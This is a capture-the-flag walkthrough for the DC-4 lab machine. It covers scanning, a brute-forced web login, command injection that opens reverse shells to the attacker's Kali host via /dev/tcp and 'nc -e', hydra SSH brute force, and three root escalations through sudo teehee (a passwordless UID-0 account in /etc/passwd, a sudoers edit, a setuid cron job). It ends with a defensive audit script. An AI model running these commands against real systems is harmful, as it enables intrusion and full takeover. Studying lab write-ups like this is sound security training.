Information gathering:
1. Host discovery:
Since both the target and Kali use NAT adapters and sit on the same subnet, arp-scan is faster:
arp-scan -I eth0 -l
Target IP: 172.16.1.130
└─# arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:dd:ee:6a, IPv4: 172.16.1.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
172.16.1.1 00:50:56:c0:00:08 VMware, Inc.
172.16.1.2 00:50:56:e5:b1:08 VMware, Inc.
172.16.1.130 00:0c:29:a4:44:6b VMware, Inc.
172.16.1.254 00:50:56:e2:96:e1 VMware, Inc.
2. Port scan:
nmap -sS -p- 172.16.1.130
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3. Service scan:
nmap -sS -sCV --version-all -O -p 22,80 172.16.1.130
------------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:A4:44:6B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
WEB part:
1. Try SQL injection:
sqlmap -u "172.16.1.130" --risk=3 --level=5 --dbs
Unsurprisingly, nothing came of it.
2. Burp Suite weak-password brute force:
The login page turns out to require the admin account.
Open Burp Suite, set the parameters and start the brute force.
Here is the imported wordlist:
Start the attack and wait for the results:
With that many entries, this takes a while.
While waiting, run a directory scan with dirsearch:
dirsearch -u http://172.16.1.130
Target: http://172.16.1.130/
[18:15:14] Starting:
[18:15:34] 302 - 704B - /command.php -> index.php
[18:15:36] 301 - 170B - /css -> http://172.16.1.130/css/
[18:15:44] 301 - 170B - /images -> http://172.16.1.130/images/
[18:15:44] 403 - 556B - /images/
[18:15:44] 403 - 15B - /index.pHp
[18:15:48] 302 - 206B - /login.php -> index.php
[18:15:48] 302 - 163B - /logout.php -> index.php
Well, nothing there. Just wait for the brute-force result.
OK, we got lucky.
Credentials: admin/happy
The page turns out to be a command-execution tool.
3. Burp Suite command execution:
We build a reverse shell and start a listener on Kali at the same time:
kali: nc -lvvp 7723
bp: /bin/sh+-i+>&+/dev/tcp/172.16.1.128/7723+0>&1 // the command is correct but nothing happens; the & may be the problem, try another one
nc+-e+/bin/bash+172.16.1.128+7723
Switching the command solved it.
Interactive shell: python -c 'import pty;pty.spawn("/bin/bash")'
Root privileges:
1. First look at the user accounts:
cat /etc/passwd
www-data@dc-4:/usr/share/nginx/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
...
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
List all files of every user under the home directories:
ls -la /home/*
www-data@dc-4:/usr/share/nginx/html$ ls -la /home/*
/home/charles:
total 20
drwxr-xr-x 2 charles charles 4096 Apr 7 2019 .
drwxr-xr-x 5 root root 4096 Apr 7 2019 ..
-rw-r--r-- 1 charles charles 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 charles charles 3526 Apr 6 2019 .bashrc
-rw-r--r-- 1 charles charles 675 Apr 6 2019 .profile
/home/jim:
total 32
drwxr-xr-x 3 jim jim 4096 Apr 7 2019 .
drwxr-xr-x 5 root root 4096 Apr 7 2019 ..
-rw-r--r-- 1 jim jim 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 jim jim 3526 Apr 6 2019 .bashrc
-rw-r--r-- 1 jim jim 675 Apr 6 2019 .profile
drwxr-xr-x 2 jim jim 4096 Apr 7 2019 backups
-rw------- 1 jim jim 528 Apr 6 2019 mbox
-rwsrwxrwx 1 jim jim 174 Apr 6 2019 test.sh
/home/sam:
total 20
drwxr-xr-x 2 sam sam 4096 Apr 7 2019 .
drwxr-xr-x 5 root root 4096 Apr 7 2019 ..
-rw-r--r-- 1 sam sam 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 sam sam 3526 Apr 6 2019 .bashrc
-rw-r--r-- 1 sam sam 675 Apr 6 2019 .profile
Nothing useful here, so let's look at the backup file in jim's backups directory, since its permissions are the loosest.
www-data@dc-4:/home/jim/backups$ ls -la
total 12
drwxr-xr-x 2 jim jim 4096 Apr 7 2019 .
drwxr-xr-x 3 jim jim 4096 Apr 7 2019 ..
-rw-r--r-- 1 jim jim 2047 Apr 7 2019 old-passwords.bak
2. SSH brute-force login
Save its contents to a file and brute-force SSH for these four users:
hydra -L users.txt -P old-passwords.txt ssh://172.16.1.130
Brute force succeeded, credentials: jim/jibril04
hydra -L users.txt -P old-passwords.txt ssh://172.16.1.130
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-25 21:22:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1008 login tries (l:4/p:252), ~63 tries per task
[DATA] attacking ssh://172.16.1.130:22/
[22][ssh] host: 172.16.1.130 login: jim password: jibril04
Let's take a look at the mail (the prompt below shows the mailbox lives in /var/mail):
cd /var/mail
New credentials found:
charles/^xHhA&hvim0y
3. Switch user:
su charles
4. Privilege escalation:
I know how to escalate with tee, but what on earth is teehee?
a. Escalate by adding a passwordless user to /etc/passwd
echo "admin::0:0:::/bin/bash" |sudo teehee -a /etc/passwd
Add the user
su admin
id
b. Write to the sudoers file so the user can run all commands as root
First use the root access from the previous step to view the contents of /etc/sudoers with cat /etc/sudoers:
root@dc-4:/var/mail# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL:ALL) ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on "#include" directives:
#includedir /etc/sudoers.d
charles ALL=(root) NOPASSWD:/usr/bin/teehee
Return to the charles user
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
whoami
id
sudo su root
c. Escalate via a scheduled task that runs a script
Write a new scheduled task into /etc/crontab.
All five time fields are *, meaning the job runs every minute; the job changes the mode of /bin/sh to 4777, so a non-root user can execute it and it runs with root privileges.
View the scheduled tasks:
cat /etc/crontab
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
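From the defender's side, the three artefacts abused in steps a, b and c leave easily auditable traces. The script below is an added example (not part of the original write-up) that checks for an extra UID-0 or passwordless entry in /etc/passwd, a per-user or NOPASSWD sudoers rule such as the teehee one, and a system cron job that sets the setuid bit on a binary. The sample file contents are constructed to mirror the output above, not captured from the box.

```python
import re
# Constructed samples modelled on the DC-4 output above; not captured from the box.
PASSWD = """root:x:0:0:root:/root:/bin/bash
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
admin::0:0:::/bin/bash
"""
SUDOERS = """Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
charles ALL=(root) NOPASSWD:/usr/bin/teehee
charles ALL=(ALL:ALL) ALL
"""
CRONTAB = """SHELL=/bin/sh
* * * * * root chmod 4777 /bin/sh
"""
def audit_passwd(text):
    """Flag UID-0 accounts other than root and accounts with an empty password field."""
    findings = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 7:
            continue
        if f[2] == "0" and f[0] != "root":
            findings.append(f"passwd: extra UID-0 account '{f[0]}'")
        if f[1] == "":
            findings.append(f"passwd: empty password field for '{f[0]}'")
    return findings
def audit_sudoers(text):
    """Flag every rule granted to an individual user; a NOPASSWD file-writing tool equals root."""
    findings = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = re.match(r"(\S+)\s+\S+=\((.*?)\)\s*(.*)", line)
        if not m or m.group(1) == "root" or m.group(1).startswith("%"):
            continue
        user, runas, cmds = m.groups()
        note = " without a password" if "NOPASSWD:" in cmds else ""
        findings.append(f"sudoers: '{user}' may run {cmds.split(':')[-1].strip()} as ({runas}){note}")
    return findings
def audit_crontab(text):
    """Flag system cron jobs whose command sets the setuid bit (chmod 4xxx or +s)."""
    findings = []
    for line in text.splitlines():
        fields = line.strip().split(None, 6)
        if len(fields) < 7 or fields[0].startswith("#") or "=" in fields[0]:
            continue
        if re.search(r"chmod\s+(4\d{3}|[ugoa]*\+[rwx]*s)", fields[6]):
            findings.append(f"crontab: '{fields[5]}' job '{' '.join(fields[:5])}' sets setuid: {fields[6]}")
    return findings
```

Run it against the real files (for example `audit_sudoers(open("/etc/sudoers").read())` as root) on a schedule and alert on any non-empty result.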